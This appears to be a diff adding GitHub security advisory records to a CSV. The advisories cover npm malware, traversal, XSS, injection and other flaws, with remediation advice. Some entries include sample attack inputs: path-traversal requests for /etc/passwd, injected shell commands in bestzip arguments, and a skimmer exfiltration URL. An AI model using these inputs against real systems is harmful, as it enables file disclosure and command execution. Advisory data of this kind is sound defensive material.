+1.4.0,GHSA-g9cg-h3jm-cwrc,2021-10-04T21:00:50Z,2020-09-03T15:47:23Z,,[],Prototype Pollution in @hapi/subtext,"Versions of `@hapi/subtext` prior to 6.1.3 or 7.0.3 are vulnerable to Prototype Pollution. A multipart payload can be constructed in a way that one of the parts’ content can be set as the entire payload object’s prototype. If this prototype contains data, it may bypass other validation rules which enforce access and privacy. If this prototype evaluates to null, it can cause unhandled exceptions when the request payload is accessed.
+
+
+## Recommendation
+
+Upgrade to versions 6.1.3, 7.0.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@hapi/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@hapi/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1480'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c5xm-m64m-f2vq,2021-10-01T20:13:30Z,2020-09-04T15:23:47Z,,[],Malicious Package in cxct,"All versions of `cxct` contain malicious code. The package finds and exfiltrates cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cxct'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1344'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vf8q-pw7h-r2x2,2021-09-30T22:03:15Z,2020-09-11T21:15:54Z,,[],Malicious Package in epress,"Version 4.13.2 of `epress` contains malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.
+
+
+## Recommendation
+
+Remove the package from your environment and verify whether your system is running the cryptocurrency miner.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'epress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/925'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9mmw-3fmh-96g3,2021-10-01T14:03:32Z,2020-09-02T20:23:38Z,,[],Malicious Package in calk,"All versions of `calk` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'calk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/855'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p788-rj37-357w,2021-09-23T21:28:12Z,2020-09-01T15:26:35Z,,['CVE-2016-1000224'],Insecure Defaults Leads to Potential MITM in ezseed-transmission,"Affected versions of `ezseed-transmission` download and run a script over an HTTP connection.
+
+An attacker in a privileged network position could launch a Man-in-the-Middle attack and intercept the script, replacing it with malicious code, completely compromising the system running `ezseed-transmission`.
+
+
+
+## Recommendation
+
+Update to version 0.0.15 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ezseed-transmission'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.10'}, {'fixed': '0.0.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.0.14'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000224'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:ezseed-transmission:20160729'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/114'}]","{'cwe_ids': ['CWE-295', 'CWE-300'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m794-qv59-gj7c,2021-10-04T15:43:26Z,2020-09-03T17:03:22Z,,[],Malicious Package in signqle,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'signqle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1410'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9p49-cwh3-4qhf,2023-07-27T00:05:10Z,2020-09-11T21:21:19Z,,[],Malicious Package in grunt-radic,"Version 0.1.1 of `grunt-radic` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.1.0",[],"[{'package': {'ecosystem': 'npm', 'name': 'grunt-radic'}, 'versions': ['0.1.1']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/934'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pr8j-3v7m-j4vv,2023-09-11T16:36:32Z,2020-09-01T17:21:45Z,,['CVE-2017-16156'],Directory Traversal in myprolyz,"Affected versions of `myprolyz` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'myprolyz'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16156'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/myprolyz'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/386'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-78p3-96hc-3j47,2023-07-27T20:31:07Z,2020-09-03T19:11:17Z,,[],Malicious Package in jquery-airload,"Version 0.2.5 of `jquery-airload` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.2.4",[],"[{'package': {'ecosystem': 'npm', 'name': 'jquery-airload'}, 'versions': ['0.2.5']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1102'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5635-9mvj-r6hp,2021-09-30T22:08:21Z,2020-09-03T02:34:39Z,,[],Malicious Package in vue-backbone,"Version 0.1.2 of `vue-backbone` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'vue-backbone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.2'}, {'fixed': '0.1.3'}]}], 'versions': ['0.1.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/945'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p5f8-gfw5-33w4,2021-08-26T15:13:48Z,2020-09-25T18:28:34Z,,['CVE-2020-15201'],Heap buffer overflow in Tensorflow,"### Impact
+The `RaggedCountSparseOutput` implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the `splits` tensor generate a valid partitioning of the `values` tensor. Hence, this code is prone to heap buffer overflow:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L248-L251
+
+If `split_values` does not end with a value at least `num_values` then the `while` loop condition will trigger a read outside of the bounds of `split_values` once `batch_idx` grows too large.
+
+### Patches
+We have patched the issue in 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and will release a patch release.
+
+We recommend users to upgrade to TensorFlow 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p5f8-gfw5-33w4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15201'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-122', 'CWE-20', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:24:59Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-86gv-xpwv-jprc,2021-09-30T19:33:54Z,2020-09-03T17:36:00Z,,[],Malicious Package in diamond-clien,"All versions of `diamond-clien` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'diamond-clien'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1052'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vx5w-cxch-wwc9,2020-08-31T18:46:58Z,2020-09-03T19:02:27Z,,[],Path Traversal in f-serv,"All versions of `f-serv` are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'f-serv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1092'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rr77-w4w8-w8wp,2023-09-07T21:56:32Z,2020-09-01T17:37:46Z,,['CVE-2017-16216'],Directory Traversal in tencent-server,"Affected versions of `tencent-server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tencent-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16216'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/tencent-server'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/418'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c2gp-86p4-5935,2021-09-27T16:20:33Z,2020-09-02T18:25:43Z,,['CVE-2019-5786'],Use-After-Free in puppeteer,"Versions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.
+
+
+## Recommendation
+
+Upgrade to version 1.13.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'puppeteer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5786'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChrome/puppeteer/issues/4141'}, {'type': 'WEB', 'url': 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'}, {'type': 'WEB', 'url': 'https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html'}, {'type': 'WEB', 'url': 'https://crbug.com/936448'}, {'type': 'PACKAGE', 'url': 'https://github.com/GoogleChrome/puppeteer'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PUPPETEER-174321'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/824'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p239-93f7-h6xf,2021-09-23T21:32:17Z,2020-09-01T15:30:58Z,,['CVE-2016-5682'],Cross-Site Scripting in swagger-ui,"Affected versions of `swagger-ui` contain a cross-site scripting vulnerability in the key names of a specific nested object in the JSON document.
+
+
+## Proof of Concept
+The vulnerable object structure is:
+```
+{
+ ""definitions"": {
+ ""arbitraryVal"": {
+ ""properties"": {
+ """": ""LoremIpsum""
+ }
+ }
+ }
+}
+```
+Malicious JSON documents can be loaded in by providing a URL to them in the `url` query string parameter.
+
+
+
+## Recommendation
+
+Update to version 2.2.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-5682'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/1865'}, {'type': 'WEB', 'url': 'https://community.rapid7.com/community/infosec/blog/2016/09/02/r7-2016-19-persistent-xss-via-unescaped-parameters-in-swagger-ui'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/126'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rx32-c25r-79mx,2023-09-13T23:05:40Z,2020-09-01T16:54:41Z,,['CVE-2017-16102'],Directory Traversal in serverhuwenhui,"Affected versions of `serverhuwenhui` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serverhuwenhui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16102'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverhuwenhui'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/366'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8m5v-f2wp-wqr9,2021-09-30T17:50:11Z,2020-09-03T17:30:36Z,,[],Malicious Package in ali-contributors,"All versions of `ali-contributors` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ali-contributors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1046'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7qw5-pqhc-xm4g,2021-11-19T15:29:44Z,2020-09-10T19:19:27Z,,['CVE-2020-15171'],Users with SCRIPT right can execute arbitrary code in XWiki,"### Impact
+
+Any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution.
+
+### Patches
+
+It has been patched in both version XWiki 12.2.1 and XWiki 11.10.5.
+
+### Workarounds
+
+The only workaround is to give SCRIPT right only to trusted users.
+
+### References
+
+https://jira.xwiki.org/browse/XWIKI-17141
+https://jira.xwiki.org/browse/XWIKI-17266
+
+It's been reported by the GitHub Security Lab under #GHSL-2020-046.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Jira XWiki](https://jira.xwiki.org)
+* Email us at [our security mailing list](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7qw5-pqhc-xm4g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15171'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-10T19:18:59Z', 'nvd_published_at': '2020-09-10T20:15:00Z'}"
+1.4.0,GHSA-gjph-xf5q-6mfq,2020-08-31T19:00:37Z,2020-09-03T15:46:02Z,,[],Denial of Service in @hapi/ammo,"Versions of `@hapi/ammo` prior to 3.1.2 or 5.0.1 are vulnerable to Denial of Service. The Range HTTP header parser has a vulnerability which will cause the function to throw a system error if the header is set to an invalid value. Because hapi is not expecting the function to ever throw, the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+Upgrade to version 3.1.2 or 5.0.1.",[],"[{'package': {'ecosystem': 'npm', 'name': '@hapi/ammo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@hapi/ammo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '5.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1474'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xfrc-7mj2-5xh9,2020-08-31T18:44:53Z,2020-09-03T17:14:51Z,,[],Undefined Behavior in zencashjs,"Versions of `zencashjs` prior to 1.2.0 may cause loss of funds when used with cryptocurrency wallets. The package relies on a string comparison of the first two characters of a Horizen address to determine the destination address type of a transaction (P2PKH or P2SH). Due to the base58 address prefixes chosen in Horizen there exists the possibility of a clash of address prefixes for testnet P2PKH and mainnet P2SH addresses, testnet P2PKH addresses start with “zt” while a subset of mainnet P2SH addresses can also start with “zt”. The package interprets transactions sent to a “zt” P2SH address on mainnet as P2PKH transactions erroneously. Any funds sent to a mainnet P2SH multisignature address starting with “zt” will be sent to the wrong address and be lost.
+
+
+## Recommendation
+
+Upgrade to version 1.2.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'zencashjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ZencashOfficial/zencashjs/commit/db01bd94b9f8a956d7835e934500eaa643f8bd13#diff-42d8d2088a96641b563b25ad908b0c0fR146'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1035'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4qqc-mp5f-ccv4,2020-09-02T15:04:08Z,2020-09-02T15:05:51Z,,[],Command Injection in bestzip,"Versions of `bestzip` prior to 2.1.7 are vulnerable to Command Injection. The package fails to sanitize input rules and passes it directly to an `exec` call on the `zip` function . This may allow attackers to execute arbitrary code in the system as long as the values of `destination` is user-controlled. This only affects users with a native `zip` command available. The following examples demonstrate the issue from the CLI and also programatically:
+- `bestzip test.zip 'sourcefile; mkdir folder'`
+- `zip({ source: 'sourcefile', destination: './test.zip; mkdir folder' })`",[],"[{'package': {'ecosystem': 'npm', 'name': 'bestzip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.7'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1554'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-09-02T15:04:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gqq4-937c-2282,2021-09-30T16:18:15Z,2020-09-03T22:49:42Z,,[],Malicious Package in juffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'juffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1272'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-ccrp-c664-8p4j,2021-09-29T19:59:57Z,2020-09-03T21:17:36Z,,[],Cross-Site Scripting in markdown-to-jsx,"Versions of `markdown-to-jsx` prior to 6.11.4 are vulnerable to Cross-Site Scripting. Due to insufficient input sanitization the package may render output containing malicious JavaScript. This vulnerability can be exploited through input of links containing `data` or VBScript URIs and a base64-encoded payload.
+
+
+## Recommendation
+
+Upgrade to version 6.11.4 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'markdown-to-jsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/probablyup/markdown-to-jsx/pull/307'}, {'type': 'PACKAGE', 'url': 'https://github.com/probablyup/markdown-to-jsx'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1219'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4c87-gg2q-fc6m,2023-07-27T20:14:11Z,2020-09-01T20:31:04Z,,[],Malicious Package in rc-calendar-jhorst,"Version 8.4.3 of `rc-calendar-jhorst` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 8.4.3 of this module is found installed you will want to replace it with a version before or after 8.4.3. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
